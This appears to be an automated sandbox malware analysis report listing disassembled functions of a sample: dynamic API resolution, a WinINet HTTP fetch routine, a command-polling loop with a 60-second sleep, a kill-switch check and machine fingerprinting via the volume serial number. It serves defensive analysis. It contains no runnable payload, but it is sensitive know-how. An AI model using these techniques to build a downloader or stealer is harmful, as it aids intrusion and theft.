                                • GetProcAddress.KERNEL32(74DD0000,0182D398), ref: 00D99D20
                                • GetProcAddress.KERNEL32(74DD0000,01815790), ref: 00D99D39
                                • GetProcAddress.KERNEL32(74DD0000,01815A10), ref: 00D99D51
                                • GetProcAddress.KERNEL32(74DD0000,018157B0), ref: 00D99D69
                                • GetProcAddress.KERNEL32(74DD0000,01815A30), ref: 00D99D82
                                • GetProcAddress.KERNEL32(74DD0000,0182D0F8), ref: 00D99D9A
                                • GetProcAddress.KERNEL32(74DD0000,0182D158), ref: 00D99DB2
                                • GetProcAddress.KERNEL32(74DD0000,0181B888), ref: 00D99DCB
                                • GetProcAddress.KERNEL32(74DD0000,018156F0), ref: 00D99DE3
                                • GetProcAddress.KERNEL32(74DD0000,0182D2D8), ref: 00D99DFB
                                • GetProcAddress.KERNEL32(74DD0000,0182D350), ref: 00D99E14
                                • GetProcAddress.KERNEL32(74DD0000,0182D2F0), ref: 00D99E2C
                                • GetProcAddress.KERNEL32(74DD0000,0182D3C8), ref: 00D99E44
                                • GetProcAddress.KERNEL32(74DD0000,01815A70), ref: 00D99E5D
                                • GetProcAddress.KERNEL32(74DD0000,0182D308), ref: 00D99E75
                                • GetProcAddress.KERNEL32(74DD0000,0182D338), ref: 00D99E8D
                                • GetProcAddress.KERNEL32(74DD0000,0182D278), ref: 00D99EA6
                                • GetProcAddress.KERNEL32(74DD0000,0182D248), ref: 00D99EBE
                                • GetProcAddress.KERNEL32(74DD0000,0182D1A0), ref: 00D99ED6
                                • GetProcAddress.KERNEL32(74DD0000,0182D188), ref: 00D99EEF
                                • GetProcAddress.KERNEL32(74DD0000,0182D260), ref: 00D99F07
                                • GetProcAddress.KERNEL32(74DD0000,0182D3E0), ref: 00D99F1F
                                • GetProcAddress.KERNEL32(74DD0000,0182D2A8), ref: 00D99F38
                                • GetProcAddress.KERNEL32(74DD0000,0182A4E0), ref: 00D99F50
                                • GetProcAddress.KERNEL32(74DD0000,0182D170), ref: 00D99F68
                                • GetProcAddress.KERNEL32(74DD0000,0182D110), ref: 00D99F81
                                • GetProcAddress.KERNEL32(74DD0000,018157F0), ref: 00D99F99
                                • GetProcAddress.KERNEL32(74DD0000,0182D320), ref: 00D99FB1
                                • GetProcAddress.KERNEL32(74DD0000,01815730), ref: 00D99FCA
                                • GetProcAddress.KERNEL32(74DD0000,0182D368), ref: 00D99FE2
                                • GetProcAddress.KERNEL32(74DD0000,0182D1E8), ref: 00D99FFA
                                • GetProcAddress.KERNEL32(74DD0000,018157D0), ref: 00D9A013
                                • GetProcAddress.KERNEL32(74DD0000,01815DB0), ref: 00D9A02B
                                • LoadLibraryA.KERNEL32(0182D380,?,00D95CA3,00DA0AEB,?,?,?,?,?,?,?,?,?,?,00DA0AEA,00DA0AE3), ref: 00D9A03D
                                • LoadLibraryA.KERNEL32(0182D1D0,?,00D95CA3,00DA0AEB,?,?,?,?,?,?,?,?,?,?,00DA0AEA,00DA0AE3), ref: 00D9A04E
                                • LoadLibraryA.KERNEL32(0182D2C0,?,00D95CA3,00DA0AEB,?,?,?,?,?,?,?,?,?,?,00DA0AEA,00DA0AE3), ref: 00D9A060
                                • LoadLibraryA.KERNEL32(0182D3B0,?,00D95CA3,00DA0AEB,?,?,?,?,?,?,?,?,?,?,00DA0AEA,00DA0AE3), ref: 00D9A072
                                • LoadLibraryA.KERNEL32(0182D128,?,00D95CA3,00DA0AEB,?,?,?,?,?,?,?,?,?,?,00DA0AEA,00DA0AE3), ref: 00D9A083
                                • LoadLibraryA.KERNEL32(0182D140,?,00D95CA3,00DA0AEB,?,?,?,?,?,?,?,?,?,?,00DA0AEA,00DA0AE3), ref: 00D9A095
                                • LoadLibraryA.KERNEL32(0182D1B8,?,00D95CA3,00DA0AEB,?,?,?,?,?,?,?,?,?,?,00DA0AEA,00DA0AE3), ref: 00D9A0A7
                                • LoadLibraryA.KERNEL32(0182D200,?,00D95CA3,00DA0AEB,?,?,?,?,?,?,?,?,?,?,00DA0AEA,00DA0AE3), ref: 00D9A0B8
                                • GetProcAddress.KERNEL32(75290000,01815E10), ref: 00D9A0DA
                                • GetProcAddress.KERNEL32(75290000,0182D410), ref: 00D9A0F2
                                • GetProcAddress.KERNEL32(75290000,01829068), ref: 00D9A10A
                                • GetProcAddress.KERNEL32(75290000,0182D3F8), ref: 00D9A123
                                • GetProcAddress.KERNEL32(75290000,01815CF0), ref: 00D9A13B
                                • GetProcAddress.KERNEL32(73440000,0181B810), ref: 00D9A160
                                • GetProcAddress.KERNEL32(73440000,01815CB0), ref: 00D9A179
                                • GetProcAddress.KERNEL32(73440000,0181B860), ref: 00D9A191
                                • GetProcAddress.KERNEL32(73440000,0182D4D0), ref: 00D9A1A9
                                • GetProcAddress.KERNEL32(73440000,0182D4E8), ref: 00D9A1C2
                                • GetProcAddress.KERNEL32(73440000,01815B50), ref: 00D9A1DA
                                • GetProcAddress.KERNEL32(73440000,01815AD0), ref: 00D9A1F2
                                • GetProcAddress.KERNEL32(73440000,0182D518), ref: 00D9A20B
                                • GetProcAddress.KERNEL32(752C0000,01815AB0), ref: 00D9A22C
                                • GetProcAddress.KERNEL32(752C0000,01815BD0), ref: 00D9A244
                                • GetProcAddress.KERNEL32(752C0000,0182D428), ref: 00D9A25D
                                • GetProcAddress.KERNEL32(752C0000,0182D500), ref: 00D9A275
                                • GetProcAddress.KERNEL32(752C0000,01815BF0), ref: 00D9A28D
                                • GetProcAddress.KERNEL32(74EC0000,0181B8B0), ref: 00D9A2B3
                                • GetProcAddress.KERNEL32(74EC0000,0181B838), ref: 00D9A2CB
                                • GetProcAddress.KERNEL32(74EC0000,0182D440), ref: 00D9A2E3
                                • GetProcAddress.KERNEL32(74EC0000,01815CD0), ref: 00D9A2FC
                                • GetProcAddress.KERNEL32(74EC0000,01815B70), ref: 00D9A314
                                • GetProcAddress.KERNEL32(74EC0000,0181BA68), ref: 00D9A32C
                                • GetProcAddress.KERNEL32(75BD0000,0182D578), ref: 00D9A352
                                • GetProcAddress.KERNEL32(75BD0000,01815B90), ref: 00D9A36A
                                • GetProcAddress.KERNEL32(75BD0000,01828F28), ref: 00D9A382
                                • GetProcAddress.KERNEL32(75BD0000,0182D488), ref: 00D9A39B
                                • GetProcAddress.KERNEL32(75BD0000,0182D4A0), ref: 00D9A3B3
                                • GetProcAddress.KERNEL32(75BD0000,01815D10), ref: 00D9A3CB
                                • GetProcAddress.KERNEL32(75BD0000,01815BB0), ref: 00D9A3E4
                                • GetProcAddress.KERNEL32(75BD0000,0182D4B8), ref: 00D9A3FC
                                • GetProcAddress.KERNEL32(75BD0000,0182D530), ref: 00D9A414
                                • GetProcAddress.KERNEL32(75A70000,01815C10), ref: 00D9A436
                                • GetProcAddress.KERNEL32(75A70000,0182D548), ref: 00D9A44E
                                • GetProcAddress.KERNEL32(75A70000,0182D560), ref: 00D9A466
                                • GetProcAddress.KERNEL32(75A70000,0182D458), ref: 00D9A47F
                                • GetProcAddress.KERNEL32(75A70000,0182D590), ref: 00D9A497
                                • GetProcAddress.KERNEL32(75450000,01815D30), ref: 00D9A4B8
                                • GetProcAddress.KERNEL32(75450000,01815DF0), ref: 00D9A4D1
                                • GetProcAddress.KERNEL32(75DA0000,01815AF0), ref: 00D9A4F2
                                • GetProcAddress.KERNEL32(75DA0000,0182D5A8), ref: 00D9A50A
                                • GetProcAddress.KERNEL32(6F070000,01815D70), ref: 00D9A530
                                • GetProcAddress.KERNEL32(6F070000,01815C30), ref: 00D9A548
                                • GetProcAddress.KERNEL32(6F070000,01815DD0), ref: 00D9A560
                                • GetProcAddress.KERNEL32(6F070000,0182D470), ref: 00D9A579
                                • GetProcAddress.KERNEL32(6F070000,01815D50), ref: 00D9A591
                                • GetProcAddress.KERNEL32(6F070000,01815C90), ref: 00D9A5A9
                                • GetProcAddress.KERNEL32(6F070000,01815D90), ref: 00D9A5C2
                                • GetProcAddress.KERNEL32(6F070000,01815E30), ref: 00D9A5DA
                                • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 00D9A5F1
                                • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 00D9A607
                                • GetProcAddress.KERNEL32(75AF0000,0182D098), ref: 00D9A629
                                • GetProcAddress.KERNEL32(75AF0000,01828F78), ref: 00D9A641
                                • GetProcAddress.KERNEL32(75AF0000,0182CF00), ref: 00D9A659
                                • GetProcAddress.KERNEL32(75AF0000,0182CFD8), ref: 00D9A672
                                • GetProcAddress.KERNEL32(75D90000,01815B10), ref: 00D9A693
                                • GetProcAddress.KERNEL32(6E460000,0182D0E0), ref: 00D9A6B4
                                • GetProcAddress.KERNEL32(6E460000,01815E50), ref: 00D9A6CD
                                • GetProcAddress.KERNEL32(6E460000,0182CFF0), ref: 00D9A6E5
                                • GetProcAddress.KERNEL32(6E460000,0182CF78), ref: 00D9A6FD
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: HttpQueryInfoA$InternetSetOptionA
                                • API String ID: 2238633743-1775429166
                                • Opcode ID: 748b6ab001c3c9d6d3eacdfb56cb2ae282620028988d3bff4b03c208746d76ea
                                • Instruction ID: 9469d133bfa8a8061d15005e8a1871c5a9c148f0efa731c6fd3298f29ed29713
                                • Opcode Fuzzy Hash: 748b6ab001c3c9d6d3eacdfb56cb2ae282620028988d3bff4b03c208746d76ea
                                • Instruction Fuzzy Hash: A3622AB650020CAFC344DFA8FF8AD5637F9FB8C609714851AA609C3264D639B851FF66
                                Function 00D86280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1033 d86280-d8630b call d9a7a0 call d847b0 call d9a740 InternetOpenA StrCmpCA 1040 d8630d 1033->1040 1041 d86314-d86318 1033->1041 1040->1041 1042 d86509-d86525 call d9a7a0 call d9a800 * 2 1041->1042 1043 d8631e-d86342 InternetConnectA 1041->1043 1062 d86528-d8652d 1042->1062 1045 d86348-d8634c 1043->1045 1046 d864ff-d86503 InternetCloseHandle 1043->1046 1048 d8635a 1045->1048 1049 d8634e-d86358 1045->1049 1046->1042 1051 d86364-d86392 HttpOpenRequestA 1048->1051 1049->1051 1052 d86398-d8639c 1051->1052 1053 d864f5-d864f9 InternetCloseHandle 1051->1053 1055 d8639e-d863bf InternetSetOptionA 1052->1055 1056 d863c5-d86405 HttpSendRequestA HttpQueryInfoA 1052->1056 1053->1046 1055->1056 1058 d8642c-d8644b call d98940 1056->1058 1059 d86407-d86427 call d9a740 call d9a800 * 2 1056->1059 1067 d864c9-d864e9 call d9a740 call d9a800 * 2 1058->1067 1068 d8644d-d86454 1058->1068 1059->1062 1067->1062 1071 d86456-d86480 InternetReadFile 1068->1071 1072 d864c7-d864ef InternetCloseHandle 1068->1072 1076 d8648b 1071->1076 1077 d86482-d86489 1071->1077 1072->1053 1076->1072 1077->1076 1078 d8648d-d864c5 call d9a9b0 call d9a8a0 call d9a800 1077->1078 1078->1071
                                APIs
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                  • Part of subcall function 00D847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00D84839
                                  • Part of subcall function 00D847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00D84849
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                • InternetOpenA.WININET(00DA0DFE,00000001,00000000,00000000,00000000), ref: 00D862E1
                                • StrCmpCA.SHLWAPI(?,0182EB68), ref: 00D86303
                                • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00D86335
                                • HttpOpenRequestA.WININET(00000000,GET,?,0182E1B0,00000000,00000000,00400100,00000000), ref: 00D86385
                                • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00D863BF
                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00D863D1
                                • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00D863FD
                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00D8646D
                                • InternetCloseHandle.WININET(00000000), ref: 00D864EF
                                • InternetCloseHandle.WININET(00000000), ref: 00D864F9
                                • InternetCloseHandle.WININET(00000000), ref: 00D86503
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                • String ID: ERROR$ERROR$GET
                                • API String ID: 3749127164-2509457195
                                • Opcode ID: 7d2c0cadda76ea938d9ce8c8b0c7c54c135e45147b2a02bf59865c3173ff7ca2
                                • Instruction ID: 9d94749a781cc0d94fb0f97a30e02f6703913ad342b162db16031b8fb60ef6f1
                                • Opcode Fuzzy Hash: 7d2c0cadda76ea938d9ce8c8b0c7c54c135e45147b2a02bf59865c3173ff7ca2
                                • Instruction Fuzzy Hash: 3B711C71A00218ABDF14EBA4DC4AFEE7778FF44714F108198F5096B190DBB4AA85DFA1
                                Function 00D95510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1090 d95510-d95577 call d95ad0 call d9a820 * 3 call d9a740 * 4 1106 d9557c-d95583 1090->1106 1107 d95585-d955b6 call d9a820 call d9a7a0 call d81590 call d951f0 1106->1107 1108 d955d7-d9564c call d9a740 * 2 call d81590 call d952c0 call d9a8a0 call d9a800 call d9aad0 StrCmpCA 1106->1108 1124 d955bb-d955d2 call d9a8a0 call d9a800 1107->1124 1134 d95693-d956a9 call d9aad0 StrCmpCA 1108->1134 1137 d9564e-d9568e call d9a7a0 call d81590 call d951f0 call d9a8a0 call d9a800 1108->1137 1124->1134 1139 d957dc-d95844 call d9a8a0 call d9a820 * 2 call d81670 call d9a800 * 4 call d96560 call d81550 1134->1139 1140 d956af-d956b6 1134->1140 1137->1134 1271 d95ac3-d95ac6 1139->1271 1142 d957da-d9585f call d9aad0 StrCmpCA 1140->1142 1143 d956bc-d956c3 1140->1143 1161 d95991-d959f9 call d9a8a0 call d9a820 * 2 call d81670 call d9a800 * 4 call d96560 call d81550 1142->1161 1162 d95865-d9586c 1142->1162 1146 d9571e-d95793 call d9a740 * 2 call d81590 call d952c0 call d9a8a0 call d9a800 call d9aad0 StrCmpCA 1143->1146 1147 d956c5-d95719 call d9a820 call d9a7a0 call d81590 call d951f0 call d9a8a0 call d9a800 1143->1147 1146->1142 1250 d95795-d957d5 call d9a7a0 call d81590 call d951f0 call d9a8a0 call d9a800 1146->1250 1147->1142 1161->1271 1167 d9598f-d95a14 call d9aad0 StrCmpCA 1162->1167 1168 d95872-d95879 1162->1168 1197 d95a28-d95a91 call d9a8a0 call d9a820 * 2 call d81670 call d9a800 * 4 call d96560 call d81550 1167->1197 1198 d95a16-d95a21 Sleep 1167->1198 1175 d9587b-d958ce call d9a820 call d9a7a0 call d81590 call d951f0 call d9a8a0 call d9a800 1168->1175 1176 d958d3-d95948 call d9a740 * 2 call d81590 call d952c0 call d9a8a0 call d9a800 call d9aad0 StrCmpCA 1168->1176 1175->1167 1176->1167 1276 d9594a-d9598a call d9a7a0 call d81590 call d951f0 call d9a8a0 call d9a800 1176->1276 1197->1271 1198->1106 1250->1142 1276->1167
                                APIs
                                  • Part of subcall function 00D9A820: lstrlen.KERNEL32(00D84F05,?,?,00D84F05,00DA0DDE), ref: 00D9A82B
                                  • Part of subcall function 00D9A820: lstrcpy.KERNEL32(00DA0DDE,00000000), ref: 00D9A885
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D95644
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D956A1
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D95857
                                  • Part of subcall function 00D9A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00D9A7E6
                                  • Part of subcall function 00D951F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D95228
                                  • Part of subcall function 00D9A8A0: lstrcpy.KERNEL32(?,00DA0E17), ref: 00D9A905
                                  • Part of subcall function 00D952C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D95318
                                  • Part of subcall function 00D952C0: lstrlen.KERNEL32(00000000), ref: 00D9532F
                                  • Part of subcall function 00D952C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00D95364
                                  • Part of subcall function 00D952C0: lstrlen.KERNEL32(00000000), ref: 00D95383
                                  • Part of subcall function 00D952C0: lstrlen.KERNEL32(00000000), ref: 00D953AE
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D9578B
                                • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00D95940
                                • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00D95A0C
                                • Sleep.KERNEL32(0000EA60), ref: 00D95A1B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpylstrlen$Sleep
                                • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                • API String ID: 507064821-2791005934
                                • Opcode ID: 0e02d6c38d4fe63957089b3b50b58b565b489652825bbf356afccbc74d0acccd
                                • Instruction ID: 8bfd17bb8d894846f8fb02352f78a31446366ff22ea70798b1c0b69f02a0ea99
                                • Opcode Fuzzy Hash: 0e02d6c38d4fe63957089b3b50b58b565b489652825bbf356afccbc74d0acccd
                                • Instruction Fuzzy Hash: FFE10C76920118AACF14FBA4ED57EED7378EF54300F508568B50667095EE34AA0DCBF2
                                Function 00D917A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1301 d917a0-d917cd call d9aad0 StrCmpCA 1304 d917cf-d917d1 ExitProcess 1301->1304 1305 d917d7-d917f1 call d9aad0 1301->1305 1309 d917f4-d917f8 1305->1309 1310 d917fe-d91811 1309->1310 1311 d919c2-d919cd call d9a800 1309->1311 1313 d9199e-d919bd 1310->1313 1314 d91817-d9181a 1310->1314 1313->1309 1316 d9185d-d9186e StrCmpCA 1314->1316 1317 d9187f-d91890 StrCmpCA 1314->1317 1318 d918f1-d91902 StrCmpCA 1314->1318 1319 d91951-d91962 StrCmpCA 1314->1319 1320 d91970-d91981 StrCmpCA 1314->1320 1321 d91913-d91924 StrCmpCA 1314->1321 1322 d91932-d91943 StrCmpCA 1314->1322 1323 d91835-d91844 call d9a820 1314->1323 1324 d91849-d91858 call d9a820 1314->1324 1325 d918ad-d918be StrCmpCA 1314->1325 1326 d918cf-d918e0 StrCmpCA 1314->1326 1327 d9198f-d91999 call d9a820 1314->1327 1328 d91821-d91830 call d9a820 1314->1328 1335 d9187a 1316->1335 1336 d91870-d91873 1316->1336 1337 d9189e-d918a1 1317->1337 1338 d91892-d9189c 1317->1338 1343 d9190e 1318->1343 1344 d91904-d91907 1318->1344 1349 d9196e 1319->1349 1350 d91964-d91967 1319->1350 1329 d9198d 1320->1329 1330 d91983-d91986 1320->1330 1345 d91930 1321->1345 1346 d91926-d91929 1321->1346 1347 d9194f 1322->1347 1348 d91945-d91948 1322->1348 1323->1313 1324->1313 1339 d918ca 1325->1339 1340 d918c0-d918c3 1325->1340 1341 d918ec 1326->1341 1342 d918e2-d918e5 1326->1342 1327->1313 1328->1313 1329->1313 1330->1329 1335->1313 1336->1335 1355 d918a8 1337->1355 1338->1355 1339->1313 1340->1339 1341->1313 1342->1341 1343->1313 1344->1343 1345->1313 1346->1345 1347->1313 1348->1347 1349->1313 1350->1349 1355->1313
                                APIs
                                • StrCmpCA.SHLWAPI(00000000,block), ref: 00D917C5
                                • ExitProcess.KERNEL32 ref: 00D917D1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000125E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001265000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001274000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795862466.0000000001275000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795970084.000000000140C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795984485.000000000140D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d80000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitProcess
                                • String ID: block
                                • API String ID: 621844428-2199623458
                                • Opcode ID: a139e4e47615eec0725bb32468e635276966a09637b28ebbf40a6d63f08dc9a3
                                • Instruction ID: 007a8503c6dcf78a3eceb4d74978af5d26b0a47dfd1533e0fa7c38460cb066da
                                • Opcode Fuzzy Hash: a139e4e47615eec0725bb32468e635276966a09637b28ebbf40a6d63f08dc9a3
                                • Instruction Fuzzy Hash: 595125B9A0420AFFCF04DFA4DA55BBE7BB5AF44704F208048E816A7280D770E955DB72
                                Function 00D97500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1356 d97500-d9754a GetWindowsDirectoryA 1357 d9754c 1356->1357 1358 d97553-d975c7 GetVolumeInformationA call d98d00 * 3 1356->1358 1357->1358 1365 d975d8-d975df 1358->1365 1366 d975fc-d97617 GetProcessHeap RtlAllocateHeap 1365->1366 1367 d975e1-d975fa call d98d00 1365->1367 1368 d97619-d97626 call d9a740 1366->1368 1369 d97628-d97658 wsprintfA call d9a740 1366->1369 1367->1365 1377 d9767e-d9768e 1368->1377 1369->1377
                                APIs
                                • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00D97542
                                • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D9757F
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00D97603
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00D9760A
                                • wsprintfA.USER32 ref: 00D97640
                                  • Part of subcall function 00D9A740: lstrcpy.KERNEL32(00DA0E17,00000000), ref: 00D9A788
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1795411098.0000000000D81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D80000, based on PE: true
                                • Associated: 00000000.00000002.1795391761.0000000000D80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E3D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000E62000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795411098.0000000000FCA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000000FDE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.0000000001161000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1795561532.000000000123B000.00000040.00000001.01000000.00000003.sdmpDownload File
